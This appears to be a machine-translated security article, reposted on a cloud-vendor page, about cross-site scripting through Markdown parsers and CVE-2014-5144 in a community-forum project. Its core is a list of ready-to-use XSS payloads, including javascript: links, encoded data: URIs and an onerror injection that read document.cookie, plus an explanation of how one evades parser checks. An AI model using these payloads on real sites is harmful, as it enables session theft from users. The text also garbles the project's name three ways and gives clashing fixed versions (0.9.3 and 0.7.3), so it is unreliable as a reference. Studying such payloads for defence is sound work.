A Markdown Parser for persistent XSS Vulnerability (CVE-2014-5144)

Source: Internet
Author: User

A Markdown Parser for persistent XSS Vulnerability (CVE-2014-5144)

What is Markdown?

Markdown is a lightweight markup language. The popularity of Markdown has been widely supported by GitHub and Stack Overflow. as an ordinary person, we can also get started easily.

Using markdown to write articles is awesome. You can leave all the trivial HTML tags behind. In the past five years, markdown has received a lot of attention. Many applications, including Reddit, Github, and StackOverflow, use markdown, which has also led to the emergence of many markdown parser, some markdown syntaxes are defined here. The syntax conventions are that the markdown parser parses these tags into html tags.

Markdown security status quo

What is the security status of the Markdow parser? Does it filter user input data?

In fact, many markdown Resolvers do not filter user input data. If markdown is used to add user comments and other functions, there may be security risks.

Here are some discussions about this issue: [1], [2], [3].

In addition, if you use googe to search:

markdown xss issue site:www.bkjia.com

 

You will find XSS vulnerabilities in many high-star projects on github.

So, how to construct some payload? See the following:

[a](javascript:prompt(document.cookie))[a](j    a   v   a   s   c   r   i   p   t:prompt(document.cookie))![a](javascript:prompt(document.cookie))\<javascript:prompt(document.cookie)> <&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>  ![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)[a](&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29)![a&#039;"`onerror=prompt(document.cookie)](x)\[citelol]: (javascript:prompt(document.cookie))[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)[test](javascript://%0d%0aprompt(1))[test](javascript://%0d%0aprompt(1);com)

The above payload was developed by Aleksa and the original author. In the past 12 months, the above payload has been proven to be valid in actual penetration tests. And many markdown Resolvers are affected. Let's take a look at the last payload:

[test](javascript://%0d%0aprompt(1);com)

 

We guess that the markdown parser may perform parsing and conversion through the following steps:

1. Are there protocol headers when determining? // Javascript pseudo protocol, Y
2. What is the hostname ending with a common domain name suffix (com, org? // Yes. Y ends with com
3. Convert the above payload to an HTML Tag. // The result is as follows:

<a href="javascript://%0d%0aprompt(1);com>test</a>

An XSS payload is constructed successfully! After you click the above link, the XSS will be triggered!

A persistent XSS Vulnerability (CVE-2014-5144)

Telstra is a famous open-source project that provides a community function like Reddit and Hackernews. One of telephony's posts and comments has an XSS vulnerability, and this feature has been around for a long time!

In versions earlier than 0.9.3, the above payload list can cause an XSS vulnerability by posting or posting comments. The vulnerability has been fixed, telvey sent changelog: http://www.telesc.pe/blog/telescope-v093-dailyscope/ here
 

 

The payload corresponding to the vulnerability is as follows:

 

[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)

 

Note: The preceding vulnerability has been fixed in telephony> = 0.7.3.

 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.